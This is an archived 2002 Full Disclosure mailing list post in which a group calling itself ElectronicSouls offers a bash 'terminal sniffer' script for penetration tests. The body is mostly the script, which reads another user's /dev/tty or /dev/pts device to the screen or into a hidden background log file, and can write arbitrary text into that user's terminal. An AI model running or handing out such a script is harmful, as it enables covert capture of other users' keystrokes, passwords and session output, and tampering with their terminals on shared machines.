Full Disclosure mailing list archives

[ElectronicSouls] - Term Sniffing Warez


From: es () hush com
Date: Fri, 29 Nov 2002 08:35:10 -0800


-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We have discovered a new technique for monitoring a user's terminal on
a system, which you may find useful in your penetration tests.

Enjoy.

# cat ES-term-sniff.sh
#!/bin/bash
# Basic Terminal Sniffer
# (C) BrainStorm - ElectronicSouls
#
# usage: ./$0 tty 1
#    or: ./$0 pts/ 2

echo ""
echo "Basic Terminal Sniffer (C) BrainStorm - ElectronicSouls"
echo ""

echo "Options:"
echo "--------"
echo "        -1 send output to screen."
echo "        -2 log output to a file. "
echo "        -3 write to a term!      "
echo "---------------------------------"

echo -n "Choose: ";read input
if [ "$input" = "" ];
     then
     echo "bye!"
     exit
fi

if [ "$input" = "1" ];
     then
     echo "- Sniffing on $1$2 started...."
     echo "- sending output to screen.   "
     cat /dev/$1$2
fi

if [ "$input" = "2" ];
     then
     echo "- Sniffing on $1$2 started...."
     echo "- logging data to term.log "
     cat /dev/$1$2 > term.log &
fi

if [ "$input" = "3" ];
     then
     echo "- Enter data that should be sent to $1$2,"
     echo "- Note that we just write to a term, it doesnt gets executed!"
     echo ""
     echo -n "- Send: "; read data
     echo "writing - $data - to $1$2 !"
     echo $data > /dev/$1$2
fi

#

Remember to use ethically!@#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"We are learning PERL too."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nl1EMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltazIAoKeiQODjFLZB
JRgKa/UgKZuL+9UDAKCfZSggtqQQYowJoz3m2ZBQ3JgpPg==
=zduV
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: